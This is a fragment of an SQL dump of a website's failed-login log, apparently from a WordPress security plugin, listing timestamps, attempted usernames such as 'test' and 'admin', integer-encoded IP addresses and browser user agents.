(99219, 1492736650.193385, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2053535298, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99218, 1492709582.323587, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 18240054, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99217, 1492684806.967400, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1950986834, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99216, 1492684805.684274, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1950986834, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99215, 1492682344.030197, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1197448705, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99214, 1492671293.443205, 1, 'loginFailValidUsername', 'julie', 2, 1029390406, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99213, 1492668610.792176, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3035750746, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99212, 1492668608.989922, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3035750746, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99211, 1492654646.414558, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3386632468, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99210, 1492654645.011105, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3386632468, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99209, 1492654134.500495, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3070075726, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99208, 1492654132.924838, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3070075726, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99207, 1492653663.031151, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3220923904, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99206, 1492650339.890475, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 622367765, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99205, 1492650338.838228, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 622367765, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99204, 1492643055.377105, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3201216398, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99203, 1492643053.102978, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3201216398, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99202, 1492643000.343956, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2981551954, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99201, 1492641384.863504, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3194237998, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99200, 1492641383.311538, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3194237998, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99199, 1492639531.667778, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2996157178, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99198, 1492639530.595396, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2996157178, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99197, 1492638073.217084, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3419676188, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99196, 1492638071.981529, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3419676188, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99195, 1492620972.879518, 1, 'loginFailValidUsername', 'admin', 1, 3245312196, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99194, 1492620972.173216, 1, 'loginFailValidUsername', 'pablo', 3, 3245312196, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99193, 1492620971.493874, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 3245312196, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99192, 1492620970.799997, 1, 'loginFailValidUsername', 'julie', 2, 3245312196, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99191, 1492620970.035480, 1, 'loginFailValidUsername', 'julie', 2, 3245312196, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99190, 1492616065.567047, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1449738601, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99189, 1492616064.156860, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1449738601, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99188, 1492612091.152465, 1, 'loginFailInvalidUsername', 'test', 0, 1499985742, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99187, 1492612089.952539, 1, 'loginFailInvalidUsername', 'test', 0, 1499985742, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99186, 1492610940.298213, 1, 'loginFailInvalidUsername', 'test', 0, 3068061270, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99185, 1492610938.728342, 1, 'loginFailInvalidUsername', 'test', 0, 3068061270, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99184, 1492610579.205531, 1, 'loginFailInvalidUsername', 'test', 0, 2057770254, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99183, 1492610208.848591, 1, 'loginFailInvalidUsername', 'test', 0, 3256756459, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99182, 1492610207.832895, 1, 'loginFailInvalidUsername', 'test', 0, 3256756459, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99181, 1492604886.313331, 1, 'loginFailInvalidUsername', 'test', 0, 2057397147, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99180, 1492604697.734781, 1, 'loginFailInvalidUsername', 'test', 0, 1521773210, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99179, 1492604696.710491, 1, 'loginFailInvalidUsername', 'test', 0, 1521773210, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99178, 1492604252.354522, 1, 'loginFailInvalidUsername', 'test', 0, 1768847622, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99177, 1492604251.254230, 1, 'loginFailInvalidUsername', 'test', 0, 1768847622, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99176, 1492601366.942354, 1, 'loginFailInvalidUsername', 'test', 0, 1409309760, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99175, 1492601365.894628, 1, 'loginFailInvalidUsername', 'test', 0, 1409309760, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99174, 1492599755.777691, 1, 'loginFailInvalidUsername', 'test', 0, 694713201, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99173, 1492598650.995087, 1, 'loginFailInvalidUsername', 'test', 0, 1600059475, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99172, 1492598649.988922, 1, 'loginFailInvalidUsername', 'test', 0, 1600059475, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99171, 1492586464.879751, 1, 'loginFailInvalidUsername', 'test', 0, 84708222, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99170, 1492586463.864198, 1, 'loginFailInvalidUsername', 'test', 0, 84708222, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99169, 1492583725.410448, 1, 'loginFailInvalidUsername', 'test', 0, 1892751844, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99168, 1492583723.837621, 1, 'loginFailInvalidUsername', 'test', 0, 1892751844, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99167, 1492580021.941367, 1, 'loginFailInvalidUsername', 'test', 0, 1166279070, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99166, 1492580020.813723, 1, 'loginFailInvalidUsername', 'test', 0, 1166279070, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99165, 1492565614.882942, 1, 'loginFailInvalidUsername', 'test', 0, 2087251461, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99164, 1492565613.234615, 1, 'loginFailInvalidUsername', 'test', 0, 2087251461, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99163, 1492565537.459727, 1, 'loginFailInvalidUsername', 'test', 0, 3568511730, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99162, 1492565536.177324, 1, 'loginFailInvalidUsername', 'test', 0, 3568511730, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99161, 1492562969.563425, 1, 'loginFailInvalidUsername', 'test', 0, 1899741878, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99160, 1492562968.162481, 1, 'loginFailInvalidUsername', 'test', 0, 1899741878, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99159, 1492552888.635325, 1, 'loginFailValidUsername', 'admin', 1, 3357381436, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99158, 1492552887.405652, 1, 'loginFailValidUsername', 'pablo', 3, 3357381436, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99157, 1492552886.180400, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 3357381436, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99156, 1492552885.031010, 1, 'loginFailValidUsername', 'julie', 2, 3357381436, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99155, 1492552883.863416, 1, 'loginFailValidUsername', 'julie', 2, 3357381436, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99154, 1492547128.776596, 1, 'loginFailInvalidUsername', 'test', 0, 1502215624, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99153, 1492545889.072292, 1, 'loginFailInvalidUsername', 'test', 0, 1549374632, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99152, 1492545888.165373, 1, 'loginFailInvalidUsername', 'test', 0, 1549374632, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99151, 1492544560.969375, 1, 'loginFailInvalidUsername', 'test', 0, 3125718184, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99150, 1492544558.925440, 1, 'loginFailInvalidUsername', 'test', 0, 3125718184, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99149, 1492542778.947516, 1, 'loginFailInvalidUsername', 'test', 0, 1517306635, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99148, 1492539708.064405, 1, 'loginFailInvalidUsername', 'test', 0, 3562313397, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99147, 1492539707.096774, 1, 'loginFailInvalidUsername', 'test', 0, 3562313397, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99146, 1492539221.092013, 1, 'loginFailInvalidUsername', 'test', 0, 1239757070, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99145, 1492539219.863786, 1, 'loginFailInvalidUsername', 'test', 0, 1239757070, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99144, 1492535520.711749, 1, 'loginFailInvalidUsername', 'test', 0, 2107874202, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99143, 1492535519.003612, 1, 'loginFailInvalidUsername', 'test', 0, 2107874202, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99142, 1492532209.085579, 1, 'loginFailInvalidUsername', 'test', 0, 403351805, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99141, 1492532207.498185, 1, 'loginFailInvalidUsername', 'test', 0, 403351805, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99140, 1492531287.689916, 1, 'loginFailInvalidUsername', 'test', 0, 1451447487, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99139, 1492531286.689239, 1, 'loginFailInvalidUsername', 'test', 0, 1451447487, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99138, 1492530857.396287, 1, 'loginFailInvalidUsername', 'test', 0, 1768719138, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99137, 1492530855.942459, 1, 'loginFailInvalidUsername', 'test', 0, 1768719138, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99136, 1492530368.461646, 1, 'loginFailInvalidUsername', 'test', 0, 1486037620, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99135, 1492530367.418167, 1, 'loginFailInvalidUsername', 'test', 0, 1486037620, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99134, 1492529849.793484, 1, 'loginFailInvalidUsername', 'test', 0, 1489990836, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99133, 1492529848.136261, 1, 'loginFailInvalidUsername', 'test', 0, 1489990836, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99132, 1492527552.574550, 1, 'loginFailInvalidUsername', 'test', 0, 1497816116, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99131, 1492527551.592321, 1, 'loginFailInvalidUsername', 'test', 0, 1497816116, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99130, 1492522130.593612, 1, 'loginFailInvalidUsername', 'test', 0, 2092795747, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99129, 1492522128.426983, 1, 'loginFailInvalidUsername', 'test', 0, 2092795747, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99128, 1492522062.306191, 1, 'loginFailInvalidUsername', 'test', 0, 3136602829, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99127, 1492522060.229487, 1, 'loginFailInvalidUsername', 'test', 0, 3136602829, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99126, 1492522029.704479, 1, 'loginFailInvalidUsername', 'test', 0, 1380787961, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99125, 1492519603.776930, 1, 'loginFailInvalidUsername', 'test', 0, 1309739612, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99124, 1492519602.782323, 1, 'loginFailInvalidUsername', 'test', 0, 1309739612, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99123, 1492516917.809426, 1, 'loginFailInvalidUsername', 'test', 0, 2016972209, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99122, 1492516916.347205, 1, 'loginFailInvalidUsername', 'test', 0, 2016972209, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99121, 1492516701.068504, 1, 'loginFailInvalidUsername', 'test', 0, 34273040, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99120, 1492516700.049807, 1, 'loginFailInvalidUsername', 'test', 0, 34273040, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99119, 1492515659.237410, 1, 'loginFailInvalidUsername', 'test', 0, 2630122612, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99118, 1492515658.082606, 1, 'loginFailInvalidUsername', 'test', 0, 2630122612, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99117, 1492513597.315137, 1, 'loginFailInvalidUsername', 'test', 0, 2545299691, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99116, 1492513596.236424, 1, 'loginFailInvalidUsername', 'test', 0, 2545299691, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99115, 1492512325.945787, 1, 'loginFailInvalidUsername', 'test', 0, 1590215498, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99114, 1492512324.723103, 1, 'loginFailInvalidUsername', 'test', 0, 1590215498, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99113, 1492511910.365321, 1, 'loginFailInvalidUsername', 'test', 0, 2177341263, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99112, 1492511909.372978, 1, 'loginFailInvalidUsername', 'test', 0, 2177341263, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99111, 1492510036.190102, 1, 'loginFailInvalidUsername', 'test', 0, 2076790141, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99110, 1492510034.743730, 1, 'loginFailInvalidUsername', 'test', 0, 2076790141, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99109, 1492509217.386934, 1, 'loginFailInvalidUsername', 'test', 0, 3134553032, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99108, 1492509215.594833, 1, 'loginFailInvalidUsername', 'test', 0, 3134553032, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99107, 1492508703.398315, 1, 'loginFailInvalidUsername', 'test', 0, 608327268, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99106, 1492508701.503904, 1, 'loginFailInvalidUsername', 'test', 0, 608327268, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99105, 1492507176.146862, 1, 'loginFailInvalidUsername', 'test', 0, 703648184, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99104, 1492507173.464063, 1, 'loginFailInvalidUsername', 'test', 0, 703648184, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99103, 1492505476.460571, 1, 'loginFailInvalidUsername', 'test', 0, 3648684353, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99102, 1492505475.473139, 1, 'loginFailInvalidUsername', 'test', 0, 3648684353, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99101, 1492501644.182625, 1, 'loginFailInvalidUsername', 'test', 0, 2047013389, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99100, 1492501642.544780, 1, 'loginFailInvalidUsername', 'test', 0, 2047013389, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99099, 1492500592.336273, 1, 'loginFailInvalidUsername', 'test', 0, 36865490, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99098, 1492500591.202169, 1, 'loginFailInvalidUsername', 'test', 0, 36865490, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99097, 1492500055.658160, 1, 'loginFailInvalidUsername', 'test', 0, 831606952, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99096, 1492500053.847071, 1, 'loginFailInvalidUsername', 'test', 0, 831606952, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99095, 1492498022.173032, 1, 'loginFailInvalidUsername', 'test', 0, 2047060457, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99094, 1492498020.280174, 1, 'loginFailInvalidUsername', 'test', 0, 2047060457, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99093, 1492485165.548061, 1, 'loginFailInvalidUsername', 'test', 0, 2630018511, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99092, 1492485164.332387, 1, 'loginFailInvalidUsername', 'test', 0, 2630018511, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99091, 1492483806.887193, 1, 'loginFailInvalidUsername', 'test', 0, 2082369434, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99090, 1492483805.619584, 1, 'loginFailInvalidUsername', 'test', 0, 2082369434, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99089, 1492482546.793912, 1, 'loginFailInvalidUsername', 'test', 0, 1825994579, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1');
INSERT INTO `www2_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(99088, 1492482316.385949, 1, 'loginFailInvalidUsername', 'test', 0, 1269756669, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99087, 1492482125.511247, 1, 'loginFailInvalidUsername', 'test', 0, 3173368969, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99086, 1492474279.039241, 1, 'loginFailInvalidUsername', 'test', 0, 2077463425, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99085, 1492473599.070357, 1, 'loginFailInvalidUsername', 'test', 0, 1844610345, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99084, 1492473597.859916, 1, 'loginFailInvalidUsername', 'test', 0, 1844610345, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99083, 1492472107.894271, 1, 'loginFailInvalidUsername', 'test', 0, 3149155376, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99082, 1492472105.658336, 1, 'loginFailInvalidUsername', 'test', 0, 3149155376, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99081, 1492470070.023897, 1, 'loginFailInvalidUsername', 'test', 0, 1336437487, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99080, 1492470068.998546, 1, 'loginFailInvalidUsername', 'test', 0, 1336437487, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99079, 1492465942.123583, 1, 'loginFailInvalidUsername', 'test', 0, 2012678856, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/71FA'),
(99078, 1492465939.882075, 1, 'loginFailInvalidUsername', 'test', 0, 2012678856, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/71FA'),
(99076, 1492465797.975557, 1, 'loginFailInvalidUsername', 'test', 0, 1501255243, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99077, 1492465799.096078, 1, 'loginFailInvalidUsername', 'test', 0, 1501255243, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99075, 1492465225.323388, 1, 'loginFailInvalidUsername', 'test', 0, 623870041, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99074, 1492465224.186143, 1, 'loginFailInvalidUsername', 'test', 0, 623870041, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99073, 1492464311.421841, 1, 'loginFailInvalidUsername', 'test', 0, 3159789393, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99071, 1492462553.629508, 1, 'loginFailInvalidUsername', 'test', 0, 3419821096, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
